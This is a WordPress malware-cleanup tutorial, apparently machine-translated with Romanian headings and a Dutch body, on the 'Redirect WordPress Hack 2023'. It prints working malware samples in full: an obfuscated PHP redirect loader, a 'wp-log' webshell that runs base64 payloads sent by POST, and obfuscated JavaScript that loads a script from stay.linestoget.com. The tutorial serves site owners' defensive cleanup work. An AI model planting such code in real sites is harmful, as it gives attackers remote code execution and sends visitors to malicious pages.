WordPress este cu siguranță cea mai utilizată platformă CMS (Content Management System) atât pentru bloguri cât și pentru magazine online starter (cu modulul WooCommerce), ceea ce o face să fie și cea mai vizată de atacuri informatice (hacking). Una dintre cele mai utilizate operațiuni de hacking are drept obiectiv redirectionarea website-ului compromis către alte pagini web. Redirect WordPress Hack 2023 este un malware relativ nou care are ca impact redirectionarea intregului site catre pagini web de spam sau care la rândul lor pot virusa calculatoarele utilizatorilor.

Als uw website, ontwikkeld op WordPress, wordt omgeleid naar een andere site, dan is deze hoogstwaarschijnlijk het slachtoffer van de toch al bekende omleidingshack.

In deze tutorial vindt u de nodige informatie en nuttige tips waarmee u een website kunt de-virusnen die is geïnfecteerd met een omleiding WordPress Hack (Virus Redirect). Via de opmerkingen kunt u aanvullende informatie krijgen of om hulp vragen.

Detectarea virusului care redirectioneaza site-urile WordPress

Een plotselinge en ongerechtvaardigde daling van het websiteverkeer, een daling van het aantal bestellingen (in het geval van webwinkels) of van de advertentie-inkomsten zijn de eerste signalen dat er iets mis is. Detectie “Redirect WordPress Hack 2023” (Virusomleiding) kan ook worden gedaan “visueel” wanneer u de website opent en wordt doorgestuurd naar een andere webpagina.

Uit ervaring blijkt dat de meeste webmalware compatibel is met internetbrowsers: Chrome, Firefox, Edge, Opera. Als u een Mac-gebruiker bent, zijn deze virussen niet erg zichtbaar in de Safari-browser. Het beveiligingssysteem van Safari blokkeert deze kwaadaardige scripts stilletjes.

Ce trebuie să faci dacă ai un website virusat cu Redirect WordPress Hack

Ik hoop dat de eerste stap niet is om in paniek te raken of de website te verwijderen. Zelfs geïnfecteerde of virusbestanden mogen in eerste instantie niet worden verwijderd. Ze bevatten waardevolle informatie die u kan helpen begrijpen waar de inbreuk op de beveiliging plaatsvindt en waardoor het virus is getroffen. Modus operandi.

Închide website-ul pentru public.

Hoe sluit je een viruswebsite af voor bezoekers? Het eenvoudigste is om de DNS-manager te gebruiken en het IP-adres ervan te verwijderen “A” (domeinnaam) of definieer er een niet-bestaand IP-adres voor. Websitebezoekers worden dus beschermd tegen deze WordPress-hackomleiding die hen naar virus- of SPAM-webpagina’s kan leiden.

Als je gebruikt CloudFlare als DNS-beheerder logt u in op uw account en verwijdert u DNS-records “A” voor de domeinnaam. Het domein dat door het virus wordt getroffen, zal dus geen IP-adres meer hebben en niet langer toegankelijk zijn via internet.

Kopieer het IP-adres van de website en doe het “route” zodat alleen jij er toegang toe hebt. Vanaf uw computer.

Hoe verander je het echte IP-adres van een website op Windows-computers?

De methode wordt vaak gebruikt om de toegang tot bepaalde websites te blokkeren door het bestand te bewerken “gastheren”.

1. Open Kladblok of een andere teksteditor (met beheerdersrechten) en bewerk het bestand “hosts“. Het bevindt zich in:

C:\Windows\System32\drivers\etc\hosts

2. In het bestand “gastheren” toevoegen “route” naar het echte IP-adres van uw website. IP hierboven verwijderd uit DNS-beheer.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Sla het bestand op en ga naar de website in de browser.

Als de website niet opent en u niets verkeerd heeft gedaan in het bestand “gastheren”, is het hoogstwaarschijnlijk een DNS-cache.

Om de DNS-cache op een Windows-besturingssysteem te wissen, opent u de opdrachtprompt, waar u de opdracht uitvoert:

ipconfig /flushdns

Hoe verander je het echte IP-adres van een website op Mac / MacBook-computers?

Voor Mac-gebruikers is het iets eenvoudiger om het echte IP-adres van een website te wijzigen.

1. Open het hulpprogramma Terminal.

2. Voer de opdrachtregel uit (hiervoor is een systeemwachtwoord vereist):

sudo nano /etc/hosts

3. Voeg, net als bij Windows-computers, het echte IP-adres van het domein toe.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Sla de wijzigingen op. Ctrl+X (y).

Nadat je dat gedaan hebt “route”, bent u de enige persoon die toegang heeft tot de geïnfecteerde website met Redirect WordPress Hack.

Volledige back-upwebsite – Bestanden en database

Zelfs als het besmet is met “WordPress-hack omleiden”, is het advies om een ​​algemene back-up van de gehele website te maken. Bestanden en database. Mogelijk kunt u ook een lokale kopie van beide bestanden opslaan public / public_html evenals de databank.

Identificatie van door virussen gebruikte bestanden en bestanden die zijn gewijzigd door Redirect WordPress Hack 2023

De belangrijkste doelbestanden van de WordPress Ik ben index.php (in de wortel), header.php, index.php En footer.php van het actieve WordPress-thema. Controleer deze bestanden handmatig en identificeer kwaadaardige code of een malwarescript.

In 2023 een virus van het type “WordPress-hack omleiden” inbrengen index.php een code van de vorm:

(Ik raad niet aan deze codes uit te voeren!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Gedecodeerd, dit script-malware het is eigenlijk het gevolg van het feit dat de WordPress-website is geïnfecteerd. Het is niet het script achter de malware, het is het script dat het mogelijk maakt de geïnfecteerde webpagina om te leiden. Als we het bovenstaande script decoderen, krijgen we:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Om alle bestanden op de server die deze code bevatten te identificeren, is het goed om toegang te hebben SSH naar de server om opdrachtregels voor bestandscontrole en beheer uit te voeren op Linux.

Verwant: Hoe u kunt achterhalen of uw blog is geïnfecteerd of niet, met behulp van Google Zoeken. (WordPress-virus)

Hieronder staan ​​twee opdrachten die zeker nuttig zijn om recentelijk gewijzigde bestanden en bestanden die een bepaalde code (tekenreeks) bevatten, te identificeren.

Hoe zie je PHP-bestanden veranderd in de afgelopen 24 uur of een ander tijdsbestek op Linux?

Commando “find” het is heel eenvoudig te gebruiken en maakt maatwerk mogelijk om de tijdsperiode, het pad waarin wordt gezocht en het type bestanden in te stellen.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

In de uitvoer ontvangt u informatie over de datum en tijd waarop het bestand is gewijzigd, de schrijf-/lees-/uitvoerrechten (chmod) en tot welke groep/gebruiker het behoort.

Als u meer dagen geleden wilt controleren, wijzigt u de waarde “-mtime -1” of gebruik “-mmin -360” minuten (6 uur).

Hoe zoek ik naar een code (string) in PHP-, Java-bestanden?

Commandoregel “vinden” waarmee je snel alle PHP- of Java-bestanden kunt vinden die een bepaalde code bevatten, is als volgt:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Met de opdracht worden de bestanden gezocht en weergegeven .php En .js die bevatten “uJjBRODYsU“.

Met behulp van de twee bovenstaande commando's kunt u heel eenvoudig achterhalen welke bestanden onlangs zijn gewijzigd en welke malwarecode bevatten.

Verwijdert kwaadaardige code uit gewijzigde bestanden zonder de juiste code in gevaar te brengen. In mijn scenario werd de malware geplaatst voordat deze werd geopend <head>.

Bij het uitvoeren van de eerste opdracht “vinden” het is heel goed mogelijk dat u ook nieuwe bestanden op de server ontdekt, die niet van WordPress zijn en daar niet door u zijn geplaatst. Bestanden die behoren tot het Redirect WordPress Hack-virus.

In het scenario dat ik onderzocht, verschenen er shapefiles op de server “wp-log-nOXdgD.php“. Dit zijn bestanden “generatie” die ook malwarecode bevatten die wordt gebruikt door het omleidingsvirus.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Het doel van typebestanden “wp-log-*” is om het omleidingshackvirus te verspreiden naar andere websites die op de server worden gehost. Het is een soort malwarecode “webshell” samengesteld uit een basis sectie (waarin enkele gecodeerde variabelen zijn gedefinieerd) en o uitvoering sectie waarmee de aanvaller kwaadaardige code op het systeem probeert te laden en uit te voeren.

Als er een variabele is POST genoemd ‘bh‘ en de gecodeerde waarde ervan MD5 is gelijk aan “8f1f964a4b4d8d1ac3f0386693d28d03“, dan lijkt het script de gecodeerde inhoud te schrijven base64 van een andere benoemde variabele ‘b3‘ in een tijdelijk bestand en probeert vervolgens dit tijdelijke bestand op te nemen.

Als er een variabele is POST of GET genoemd ‘tick', zal het script reageren met de waarde MD5 van de snaar “885“.

Om alle bestanden op de server te identificeren die deze code bevatten, kiest u een tekenreeks die gebruikelijk is en voert u vervolgens de opdracht de uit “find” (vergelijkbaar met degene hierboven). Verwijder alle bestanden die deze malwarecode bevatten.

Beveiligingsprobleem misbruikt door Redirect WordPress-hack

Hoogstwaarschijnlijk arriveert dit omleidingsvirus via misbruik maken van de WordPress admin-gebruiker of door het identificeren van een kwetsbare plug-in waarmee gebruikers met beheerdersrechten kunnen worden toegevoegd.

Voor de meeste websites gebouwd op het WordPress-platform is dit mogelijk thema- of plug-inbestanden bewerkenvanuit de beheerinterface (Dashboard). Zo kan een kwaadwillende persoon malwarecode aan de themabestanden toevoegen om de hierboven weergegeven scripts te genereren.

Een voorbeeld van dergelijke malwarecode is dit:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript geïdentificeerd in de WordPress-themakop, onmiddellijk na het openen van de tag <head>.

Het is vrij moeilijk om dit JavaScript te ontcijferen, maar het is duidelijk dat het een ander webadres opvraagt ​​vanwaar het hoogstwaarschijnlijk andere scripts ophaalt om de bestanden te maken “wp-log-*” waar we het hierboven over hadden.

Zoek en verwijder deze code uit alle bestanden PHP aangetast.

Voor zover ik kon zien, was deze code dat wel handmatig toegevoegd door een nieuwe gebruiker met beheerdersrechten.

Om de toevoeging van malwarecode vanuit het Dashboard te voorkomen, kunt u dus het beste de optie uitschakelen om WordPress-thema's / plug-ins vanuit het Dashboard te bewerken.

Bewerk het bestand wp-config.php en voeg de regels toe:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Nadat u deze wijziging heeft aangebracht, kan geen enkele WordPress-gebruiker bestanden vanuit het Dashboard bewerken.

Controleer gebruikers met de beheerdersrol

Hieronder vindt u een SQL-query die u kunt gebruiken om te zoeken naar beheerders op het WordPress-platform:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Deze query retourneert alle gebruikers in de tabel wp_users die de beheerdersrol heeft toegewezen. De query wordt ook voor de tabel uitgevoerd wp_usermeta om de meta te doorzoeken ‘wp_capabilities', dat informatie bevat over gebruikersrollen.

Een andere methode is om ze te identificeren aan de hand van: Dashboard → Users → All Users → Administrator. Er zijn echter manieren waarop een gebruiker kan worden verborgen in het Dashboard-paneel. Dus de beste manier om gebruikers te zien “Beheerder” van WordPress is de bovenstaande SQL-opdracht.

In mijn geval heb ik de gebruiker bij naam geïdentificeerd in de database “wp-import-user“. Nogal suggestief.

Ook vanaf hier kunt u de datum en tijd zien waarop de WordPress-gebruiker is aangemaakt. De gebruikers-ID is ook erg belangrijk omdat deze de serverlogboeken doorzoekt. Op deze manier kunt u alle activiteit van deze gebruiker zien.

Verwijder gebruikers met beheerdersrol wat jij dan niet weet wachtwoorden wijzigen voor alle beheerders. Redacteur, auteur, beheerder.

Wijzig het wachtwoord van de SQL-databasegebruiker van de getroffen website.

Na het nemen van deze stappen kan de website voor alle gebruikers opnieuw worden opgestart.

Houd er echter rekening mee dat wat ik hierboven heb gepresenteerd een van de misschien wel duizenden scenario’s is waarin een website in 2023 is geïnfecteerd met Redirect WordPress Hack.

Als uw website is geïnfecteerd en u hulp nodig heeft of als u vragen heeft, is het opmerkingengedeelte geopend.